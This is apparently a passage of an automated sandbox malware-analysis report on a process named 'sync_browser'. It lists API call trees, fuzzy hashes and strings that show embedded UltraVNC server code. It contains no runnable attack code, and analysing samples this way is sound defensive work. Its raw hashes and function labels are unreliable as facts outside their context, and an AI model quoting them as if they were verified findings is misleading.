                                                                      • Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8
                                                                    • free.LIBCMT ref: 00007FF740022564
                                                                    • free.LIBCMT ref: 00007FF740022617
                                                                      • Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
                                                                      • Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
                                                                      • Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF74002230B
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                                    • API String ID: 1063416079-2438250478
                                                                    • Opcode ID: c8127eda37e24eb0f1373976952f84f390e4194099f3fcaac9a3a64be35eede2
                                                                    • Instruction ID: 5c2fa08e9d1aa823dd9c8a547c1b2fc3772a3b01e787280869b6eaa2a9962d13
                                                                    • Opcode Fuzzy Hash: c8127eda37e24eb0f1373976952f84f390e4194099f3fcaac9a3a64be35eede2
                                                                    • Instruction Fuzzy Hash: 40A17E26B08A91C4EB50FB76D4542AD6360FB84FA8F548236DE2E57BE9CF38D845C310
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF74002A5D6
                                                                    • i, xrefs: 00007FF74002A754
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
                                                                    • API String ID: 3168844106-2727237473
                                                                    • Opcode ID: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                    • Instruction ID: 2decd536b8e7e14edcd10a0a428525059e8cccff508693bdc40fb170952ad50b
                                                                    • Opcode Fuzzy Hash: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                    • Instruction Fuzzy Hash: E261C022B0C7C2DAE765BB2598047BAA7A0FB46754F840139DA9D477E9DF3CE884C710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DataRegion$DeleteObject
                                                                    • String ID:
                                                                    • API String ID: 3467850875-0
                                                                    • Opcode ID: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
                                                                    • Instruction ID: ae178ec7e9761134c5c55367dcd658953332d481347d5a19780331104d54dcdb
                                                                    • Opcode Fuzzy Hash: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
                                                                    • Instruction Fuzzy Hash: 9751F1B3609A51C7D750EF19D440A6CB7E0FB48B94B84D232EA4D83768DF39E881CB40
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF74000C5D4
                                                                      • Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
                                                                      • Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
                                                                      • Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
                                                                      • Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
                                                                      • Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$AllocHeap_callnewhmalloc
                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
                                                                    • API String ID: 908589684-1814909704
                                                                    • Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                    • Instruction ID: 5415c8e1e333d8ec899f21f27deb8802d8dbab53f7067ce451ef9f5870ab3ac9
                                                                    • Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                    • Instruction Fuzzy Hash: 5821AA32B1D795C6D360AB69B440728B791F744390F881232EB9C07BD9DE3AE002C710
                                                                    APIs
                                                                    • Sleep.KERNEL32 ref: 00007FF740017720
                                                                      • Part of subcall function 00007FF740017A30: SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A4B
                                                                      • Part of subcall function 00007FF740017A30: SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A55
                                                                      • Part of subcall function 00007FF740017A30: SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A5F
                                                                      • Part of subcall function 00007FF740017A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A8B
                                                                      • Part of subcall function 00007FF740017A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A95
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$CriticalInitializeSection$Sleepmalloc
                                                                    • String ID: keyEvent$start_event$stop_event
                                                                    • API String ID: 367317321-1979648887
                                                                    • Opcode ID: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
                                                                    • Instruction ID: 46d56b6130015e758cd8708f9f562a61fd78d352018ea7e57f6f0f5b77550ecc
                                                                    • Opcode Fuzzy Hash: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
                                                                    • Instruction Fuzzy Hash: D8313B25E1DA03C0FA64BB54A494B79A3A1AF85784FC40035DA4E0B7FAEF3EF5448761
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                                    • String ID: G
                                                                    • API String ID: 2834860089-985283518
                                                                    • Opcode ID: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
                                                                    • Instruction ID: c77051c8ad9896824bddca93bdbce16165b0c619cead3e607b23cd200948c245
                                                                    • Opcode Fuzzy Hash: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
                                                                    • Instruction Fuzzy Hash: 22315E3251CB81C6E711BF25E5443A8B3A4FF44BA4F840235DA9947BA8CFB8E495C721
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2819658684-0
                                                                    • Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                    • Instruction ID: 592d664e5a20d3aee3eebf3f7cc863f1e17ba986d0777db7c2e76118ebacf4b4
                                                                    • Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                    • Instruction Fuzzy Hash: A0218421A1D643D5F7617BA5680137EE2B4AF45BC0F844435E98D47BAEDF2CF4009724
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 948891078-0
                                                                    • Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                    • Instruction ID: bb3f1af4474458d6f35197982228464c117d3f8ec3835771867af556a6945bc0
                                                                    • Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                    • Instruction Fuzzy Hash: 4221013661CB41C2E710AB69F45466AB3A0FB89B54F905131E69E837A8DF7DE444CB20
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF740083CCE
                                                                      • Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
                                                                      • Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
                                                                      • Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
                                                                      • Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
                                                                      • Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8
                                                                    • free.LIBCMT ref: 00007FF740083CFA
                                                                      • Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
                                                                      • Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
                                                                      • Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C
                                                                    • free.LIBCMT ref: 00007FF740083D0E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                    • String ID: Unable to allocate memory in zip library at %s
                                                                    • API String ID: 1063416079-1743894623
                                                                    • Opcode ID: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
                                                                    • Instruction ID: 9f747129a7ae0065a50e1ea80ec85fc5e8a56c61a5e8e5e07debd38100a3fa4b
                                                                    • Opcode Fuzzy Hash: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
                                                                    • Instruction Fuzzy Hash: 6811D32261DB82C5EA50FB55B44017AB760FB84B94F881135EF9D437AADF3CF4428B14
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                                    • String ID:
                                                                    • API String ID: 1747828912-0
                                                                    • Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                    • Instruction ID: d7d0fd1cc429778a650e402f62421e77005bba6c3e99e95f4a939dae29b9f912
                                                                    • Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                    • Instruction Fuzzy Hash: 6F115C72A28B51D7E704AF25F584159B7A4FB48B90F90413AEB5943B64CF38F471CB50
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32 ref: 00007FF7400292F0
                                                                      • Part of subcall function 00007FF740097520: EnterCriticalSection.KERNEL32 ref: 00007FF740097534
                                                                      • Part of subcall function 00007FF740097520: ReleaseSemaphore.KERNEL32 ref: 00007FF740097577
                                                                      • Part of subcall function 00007FF740097520: GetLastError.KERNEL32 ref: 00007FF740097581
                                                                      • Part of subcall function 00007FF740097520: LeaveCriticalSection.KERNEL32 ref: 00007FF74009758C
                                                                      • Part of subcall function 00007FF740097400: EnterCriticalSection.KERNEL32 ref: 00007FF740097427
                                                                      • Part of subcall function 00007FF740097400: LeaveCriticalSection.KERNEL32 ref: 00007FF740097472
                                                                      • Part of subcall function 00007FF740097400: LeaveCriticalSection.KERNEL32 ref: 00007FF74009747B
                                                                      • Part of subcall function 00007FF740097400: WaitForSingleObject.KERNEL32 ref: 00007FF74009748A
                                                                      • Part of subcall function 00007FF740097400: EnterCriticalSection.KERNEL32 ref: 00007FF740097495
                                                                      • Part of subcall function 00007FF740097400: GetLastError.KERNEL32 ref: 00007FF7400974A7
                                                                      • Part of subcall function 00007FF740097400: EnterCriticalSection.KERNEL32 ref: 00007FF7400974DE
                                                                      • Part of subcall function 00007FF740097400: LeaveCriticalSection.KERNEL32 ref: 00007FF740097500
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                                    • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                                    • API String ID: 1962697109-2518527632
                                                                    • Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                    • Instruction ID: a35f3745e5e3b684ec6097df0e27a9ffbe90879a13d88a31c656b98b222ee8d7
                                                                    • Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                    • Instruction Fuzzy Hash: DF113D72A1CA82C2EB04BF25E4506E9A361FB84BA4F884235DA5D473F9DF78E504C720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
